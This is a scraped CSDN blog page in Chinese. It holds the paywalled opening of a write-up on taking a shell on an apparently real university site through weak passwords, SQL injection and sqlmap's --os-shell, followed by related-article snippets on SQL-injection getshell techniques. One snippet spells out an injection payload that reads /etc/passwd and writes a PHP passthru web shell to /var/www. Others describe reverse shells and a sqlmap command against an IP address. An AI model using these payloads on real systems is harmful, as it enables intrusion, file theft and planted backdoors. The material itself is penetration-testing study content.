getshell之sql注入os-shell

已于 2022-02-22 18:44:54 修改
阅读量2k 收藏 4
点赞数
分类专栏: getshell 文章标签: 安全 经验分享
于 2020-12-10 10:12:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MoCoCN/article/details/110946998
版权
本文记录了一次通过SQL注入获取shell的完整过程,从普通用户弱口令爆破开始,逐步揭示后台SQL注入,利用os-shell,尝试写shell并最终通过反弹shell或文件查找技术成功获取webshell的详细步骤。过程中得到了其他安全专家的帮助。
摘要由CSDN通过智能技术生成

@MoCo菜弟弟记录一次从普通用户弱口令到sql注入拿shell

0x00 前言

这段时间一直在挖edu,挖到一个从普通用户权限到getshell的站,觉得挺有意义的,记录了一下,也学到了挺多知识的,但中间出现了些小插曲,有个地方没搞好,没弄明白,就一直没发文章,最近通过某不知名大佬的帮助下已经弄懂了,所以前来发个文章。

这几天公司没什么活,主要是保公司CNVD和CNNVD的资质,就是无限的刷洞,上周末领导发了句这个,我感觉是对我们这个交洞数量有点不满。
在这里插入图片描述
在这里插入图片描述

该说不说,该做不做的,领导既然都说那了必须得安排啊
在兄弟们的努力下,3天已经基本拿下。
在这里插入图片描述

在交洞期间某不知名大佬在吃饭前给我说了句我那个大学他找到路径了,吃完饭就迫不及待的把复现笔记要了过来学习学习。

0X01 爆破</

最低0.47元/天 解锁文章
MoCoCN
关注
专栏目录
sql注入shell条件与方法(统计)
Vdieoo的博客
10-30 7831
条件: 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了 3:要有file权限,默认情况下只有root有 4:对目录要有写权限,一般image之类的存放突破的目录就有 在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp"被注释 或者`secure_file_priv配置的位置是web目录。 要了解secure_file_priv是否支...
kali渗透学习-手动sql注入(二)读取文件、写入文件、反弹shell
weixin_43239236的博客
01-23 461
读取文件【使用load_file函数】 ’ union SELECT null,load_file(’/etc/passwd’)–(有一个空格) 也可以使用burpsuite进行注入 写入文件 ' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+ 【写入一句话木马;INTO DUMPLING:MySQL函数,将输入下载在数据库中】 此语句往往会提示无法写入,因
sql注入之getshell方式
最新发布
m0_52484587的博客
07-11 1236
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
sql注入getshell的几种方式
热门推荐
内心不种满鲜花就会长满杂草
04-29 2万+
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
DC-3 渗透实战---sql注入、反弹shell、Ubuntu16.04double-fdput()提权
z2560088的博客
09-26 752
扫描靶机Ip根据靶机Mac确定靶机ip地址为 nmap -sP 192.168.160.0/24 或 netdiscover -r 192.168.160.0/24 确定ip地址为192.168.160.141 nmap 192.168.160.141 -sV -p- -A 发现80端口,和开源内容管理系统 joomla 连接http://192.168.160.141 joomscan --url http://192.168.160.141 发现joomla...
Zabbix sql注入漏洞脚本执行反弹shell
weixin_30919429的博客
05-18 836
exp检测是否存在SQL注入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------------------------------+ Python Zabbix<3.0.4 SQL注入 Exploitsuccess+--------------------...
sql注入到getshell (内附sqlmap的os-shell遇到中文路径的解决办法)
hackzkaq的博客
12-23 3795
`搜索公众号:白帽子左一,每天更新技术干货! 作者:掌控安全学员——君叹 基本界面 试试看信息列表里面随便点一条看下网络请求 可以看到一个带有参数的请求,我们试着直接访问 直接访问的话能够看到直接的文章内容 尝试一下更改bti的值 试试直接用sqlmap跑 测试成功,存在sql注入 尝试参数 —os-shell 看看是否能拿到shell 成功getshell 但是我们执行命令默认都在’C:\Windows\system32’这个路径下 我们可以看到当我们执行e: 没有回显 再次执行chdi.
SQL注入漏洞-10】SQL注入-getshell靶场实战
cc
02-08 5689
没有写入webshell的情况有两种:● 网站的路径不对,或者没有使用双斜杠进行转义● secure_file_priv的值不是为空。利用的前提条件: • 知道网站的绝对路径(根目录,或者是根目录往下的目录都可以) • web目录具有写的权限,能够使用单引号 • secure_file_priv没有具体值(在mysql/my.ini中查看)
sqlserver手注getshell分析:
m0_59757868的博客
08-19 2579
sqlmap
Mysql注入思路+编写脚本批量dump数据+getshell——SQL注入
CC__Faker的博客
06-17 1527
目录前言0x00 sql注入测试0x0001 注点判断0x0002 回显字段判断0x0003 函数注入0x0004 数据获取0x01 数据下载0x0100 思路0x0101 获取页面0x0102 正则提取0x0103 获取一组数据0x0104 获取多组数据并写入0x0105 程序运行 前言 本次渗透测试的目的是为了验证SQL注入的危害和对联合查询注入流程的详细讲解,以及编写脚本批量下载。 环境:sqli-labs less-1,phpstduy 工具:蚁剑、pycharm 0x00 sql注入测试 0x
MSSQL注入--反弹注入
weixin_30873847的博客
06-25 585
明明是sql注入的点,却无法进行注入,注射工具拆解的速度异常的缓慢,错误提示信息关闭,无法返回注入的结果,这个时候你便可以尝试使用反弹注入, 反弹注入需要依赖于函数opendatasource的支持,将当前数据库中的查询结果发送到另一数据库服务器中。 判断数据库类型 and exists (select * from sysobjects)--返回正常为mssql(也名sql serve...
命令注入反弹shell
-
05-23 421
命令注入反弹shell dvwa
sql写shell原理
xyxyxyxyy的博客
09-14 836
主要阐述了sqlmap工具写webshell到mysql中的原理
渗透测试基础-SQL server数据库之反弹注入
weixin_45488495的博客
04-15 654
渗透测试基础-SQL server数据库之反弹注入SQL server数据库SQLserver显错注入靶场演练堆叠注入SQLserver反弹注入漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! SQL server数据库 既然要学习SQLserver数据库的注入知识,那当然得先了解一下SQLserver的语句。 数据库都有着相通的地方,所以其SQL语句也相差不大。先来看一下SQLserver数据库是怎样的一个数据结构。 根据截
sqlmap 如何 --os-shell 及反弹shell
weixin_63580357的博客
10-17 1085
从上面结果可以看出已经成功反弹 shell,不过这个 shell 操作起来不甚顺畅,可以在 Kali 生成反弹 shell 代码,借助上面生成的一个文件上传界面。就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下。-o shell.php:指定生成的payload文件的名称为shell.php。
MSSQL反弹注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-17 517
MSSSQL注入——反弹注入 我们首先先回顾一下MSSQL普通的显错注入(毕竟MSSQL显错注入和MYSQL不太一样) 我这里还是联合传为例子,首先猜字段,然后联合查询,记住要写union all,然后猜输出点,要使用NULL去填充,注释只有 – + select name from dbo.sysdatabases 查询系统库 sysobjects 查询系统表 (xtype=‘U’) syscolumns 字段 (id= ) 指定sysobjects库中表名对应id 先尝试显错注入 ‘ and o
【MSSQL-反弹注入】
weixin_52351575的博客
09-20 386
注意后方的输出位必须和联合查询的数据类型一样,但不知道数据类型我们可以直接用null代替(绕过)这里需要注意MSSQL的库名不是database()而是db_name()下一步,得到admin表的id查admin表下的列。先查出各个表的id作为检索内容。最后提交flag结束!
内网渗透模拟演练:使用sqlmap对内网mssql提权与反弹shell
zh的博客
10-24 4157
准备:假设内网有一台2003服务器(使用mssql数据库),把网页服务80端口映射到防火墙8092端口,外网一台centos用来接收反弹shell 工具:sqlmap、msf、apache sqlmap进行注入 测试页面存在注入点 使用sqlmap进行注入 sqlmap -u "http://61.136.208.30:8092/Content.aspx?ClassId=1&id=4" -p "id" --dbms "mssql" 注入成功,获取到了服务器信息
sql注入getshell
09-09
### 回答1: SQL注入攻击是一种通过构造恶意的SQL语句来破坏数据库安全的技术。...总之,SQL注入是一种严重的安全问题,开发者应该重视,并采取相应的安全措施来防止SQL注入GetShell漏洞的发生,保护用户和系统的安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值